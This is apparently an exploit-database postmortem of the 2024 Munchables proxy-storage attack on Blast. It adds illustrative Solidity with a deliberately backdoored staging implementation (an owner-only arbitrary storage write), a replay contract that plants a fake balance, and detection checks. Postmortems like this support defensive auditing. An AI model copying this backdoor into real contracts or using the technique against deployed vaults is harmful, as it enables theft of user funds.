The Munchables Lock contract was deployed behind an upgradeable proxy (ERC1967-style) by a developer the team later identified as a DPRK-linked insider operating under the alias Werewolves0943. Before the public-facing implementation was set, the rogue developer pointed the proxy at an unverified initial implementation that exposed an owner-only function permitting direct writes to arbitrary storage slots. Using that backdoor, the attacker wrote a deposited-ETH balance of 1,000,000 ether into their own user-balance slot in the proxy's storage, then upgraded the implementation to the clean, public-facing Lock contract. Because a proxy's storage persists across implementation upgrades, the planted value survived the swap. Months later, once TVL had grown to ~17,400 ETH, the attacker simply called the legitimate withdraw path; the new implementation read the pre-planted balance, treated it as a valid deposit, and released the entire vault. The exploit required no logic bug in the visible production code: the deployed bytecode of the unverified staging implementation and the proxy's upgrade history were the evidence.
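The pattern in minimal Solidity, as an added example rather than the Munchables contracts themselves (which are not reproduced here): a proxy whose storage outlives its code, an unverified staging implementation with an owner-only raw storage write, a clean implementation that trusts whatever is in storage, and a replay contract that plants a balance, upgrades, and reads it back through the clean code. All contract and function names (`Proxy`, `StagingImpl.writeSlot`, `LockImpl`, `Replay`) and the storage layout are assumptions made for the illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// ERC1967 slots: keccak256("eip1967.proxy.implementation")-1 and keccak256("eip1967.proxy.admin")-1.
bytes32 constant IMPL_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;
bytes32 constant ADMIN_SLOT = 0xb53127684a568b3173ae13b9f8a6016e243e63b6e8ee1178d6a717850b5d6103;

// Minimal ERC1967-style proxy. All state lives here; implementations only supply code,
// so anything written into these slots survives every later upgrade.
contract Proxy {
    event Upgraded(address indexed implementation);

    constructor(address impl) {
        bytes32 a = ADMIN_SLOT; bytes32 s = IMPL_SLOT; address admin = msg.sender;
        assembly { sstore(a, admin) sstore(s, impl) }
        emit Upgraded(impl);
    }

    function upgradeTo(address impl) external {
        bytes32 a = ADMIN_SLOT; bytes32 s = IMPL_SLOT; address admin;
        assembly { admin := sload(a) }
        require(msg.sender == admin, "not admin");
        assembly { sstore(s, impl) }
        emit Upgraded(impl);
    }

    receive() external payable {}

    fallback() external payable {
        bytes32 s = IMPL_SLOT;
        assembly {
            let impl := sload(s)
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }
}

// Storage layout shared by both implementations (assumed): slot 0 = owner, slot 1 = locked.
abstract contract LockStorage {
    address public owner;
    mapping(address => uint256) public locked;
}

// The unverified "staging" implementation: an owner-only raw storage write is the backdoor.
contract StagingImpl is LockStorage {
    function initialize() external {
        require(owner == address(0), "already initialized");
        owner = msg.sender;
    }

    function writeSlot(bytes32 slot, bytes32 value) external {
        require(msg.sender == owner, "not owner");
        assembly { sstore(slot, value) }
    }
}

// The clean, public-facing implementation. No bug here: it trusts whatever storage says.
contract LockImpl is LockStorage {
    function lock() external payable {
        locked[msg.sender] += msg.value;
    }

    function unlock(uint256 amount) external {
        require(locked[msg.sender] >= amount, "insufficient");
        locked[msg.sender] -= amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

// Replays the sequence: plant under the staging code, upgrade, read through the clean code.
contract Replay {
    function run(address attacker) external returns (uint256 planted, bool solvent) {
        Proxy proxy = new Proxy(address(new StagingImpl()));
        StagingImpl(address(proxy)).initialize();   // this contract becomes owner

        // Slot of locked[attacker] = keccak256(abi.encode(key, baseSlot)) with baseSlot = 1.
        bytes32 slot = keccak256(abi.encode(attacker, uint256(1)));
        StagingImpl(address(proxy)).writeSlot(slot, bytes32(uint256(1_000_000 ether)));

        proxy.upgradeTo(address(new LockImpl()));   // backdoor leaves the code, not the storage

        planted = LockImpl(address(proxy)).locked(attacker);  // 1_000_000 ether
        // Solvency invariant a monitor should enforce: total user claims <= ETH actually held.
        solvent = planted <= address(proxy).balance;           // false: nothing was deposited
    }
}
```

Deploy `Replay` in Remix or a Foundry test and call `run(<any address>)`: `planted` comes back as 1,000,000 ether although the proxy holds no ETH, so `solvent` is false. Two checks fall out of this. First, the proxy's `Upgraded` events enumerate every implementation the proxy has ever pointed at, and each of them, verified or not, needs review, since a storage write made under an earlier implementation is invisible in the current one's source. Second, a live solvency invariant (sum of user claims never exceeds the contract's balance) flags a planted balance by orders of magnitude long before the withdraw call.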
Classification: Protocol Logic. Technique: Storage Slot Exploit. Target type: Gaming. Affected chains: Blast. Implementation language: Solidity.
- chain: blast
- protocol: Munchables
- bug_class: logic
- date_occurred: 2024-03-26
- loss_usd: $62,500,000
- classification: Protocol Logic
- technique: Storage Slot Exploit
- target_type: Gaming
- language: Solidity
- source_id: dl:4369